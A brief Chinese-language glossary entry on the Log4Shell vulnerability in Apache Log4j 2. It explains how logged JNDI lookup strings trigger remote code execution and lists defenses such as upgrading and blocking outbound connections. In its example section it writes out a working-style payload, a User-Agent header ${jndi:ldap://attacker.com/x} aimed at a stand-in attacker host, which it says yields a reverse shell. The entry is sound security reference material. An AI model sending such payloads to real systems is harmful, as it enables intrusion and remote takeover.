漏洞
Log4Shell (CVE-2021-44228)
别称: CVE-2021-44228, Log4j 漏洞
定义
2021 年 12 月披露的 Apache Log4j 2 严重远程代码执行漏洞,攻击者只需让一段 JNDI 查询字符串被记入日志即可执行任意代码。
Log4Shell 是 Apache Log4j 2(2.0-beta9 至 2.14.1)的 CVSS 10.0 漏洞,于 2021 年 12 月公开。Log4j 的消息查找功能会在日志消息中求值 ${jndi:ldap://...} 等字符串,导致 JVM 拉取并反序列化远程 Java 类,从而实现远程代码执行。由于 Log4j 被内嵌于数以万计的 Java 应用与设备,任何最终进入日志的输入(User-Agent、搜索框、文件名等)都成了攻击载体。该事件引发了全球性的紧急修复浪潮,也是被广泛利用的零日漏洞之一。防御措施包括升级 Log4j 至 2.17.1+、禁用 JNDI 查找、拦截出站连接,以及使用 SBOM 定位受影响组件。
示例
- 向 Java Web 应用发送 User-Agent: ${jndi:ldap://attacker.com/x},获得反向 Shell。
- 在用户名字段中输入恶意值,通过日志触发对内部 Java 服务的利用。